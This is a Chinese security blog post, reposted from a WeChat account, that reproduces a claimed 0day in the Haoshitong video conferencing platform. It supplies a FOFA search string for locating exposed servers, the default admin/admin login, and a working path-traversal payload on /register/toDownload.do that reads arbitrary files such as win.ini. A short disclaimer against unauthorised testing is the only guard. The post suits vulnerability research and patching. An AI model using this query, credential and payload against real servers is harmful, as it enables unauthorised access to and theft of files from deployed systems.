漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞

admin 2021年4月4日00:00:50评论1,492 views字数 695阅读2分19秒阅读模式

漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞

前言



申明:本次测试只作为学习用处,请勿未授权进行渗透测试,切勿用于其它用途!



漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞

Part.1 漏洞背景



好视通云会议是一款高效、便捷、低成本的网络视频会议产品,通过电脑或手机登录好视通云平台,便可快速地与全球各地团队进行实时音视频沟通,并可同步分享各类数据文档。



漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞

Part.2 漏洞描述



好视通视频会议平台存在弱口令及前台任意文件下载漏洞。

可获取任意敏感文件信息。



漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞

Part.3 漏洞影响范围



Copyright © 2013-2019

漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞

Copyright ©  2013-2018

漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞



漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞

Part.4 FoFa语法



"深圳银澎云计算有限公司"

漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞



漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞

Part.5 漏洞复现



该系统存在一个默认的管理员口令
admin / admin
后台界面:

漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞


前台任意文件下载
漏洞url:

/register/toDownload.do?fileName=敏感文件路径

漏洞复现:

https://xxxxxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini

漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞

漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞

复现成功!



如果对你有帮助的话
那就长按二维码,关注我们吧!

漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞
漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞



漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞

漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞  实战 | 记一次利用mssql上线

漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞  漏洞复现 | 某系统通用(0day)

漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞   漏洞复现 | (通用0day)某实践教学平台存在通用SQLi漏洞

漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞   漏洞复现 | Microsoft Windows10 本地提权漏权 CVE-­2021­-1732

漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞   漏洞复现 | (通用0day)金和C6协同OA管理平台后台存在水平越权漏洞

右下角求赞求好看,喵~

本文始发于微信公众号(F12sec):漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月4日00:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 | (通用0day)好视通视频会议平台存在任意文件下载漏洞http://cn-sec.com/archives/325910.html

发表评论

匿名网友 填写信息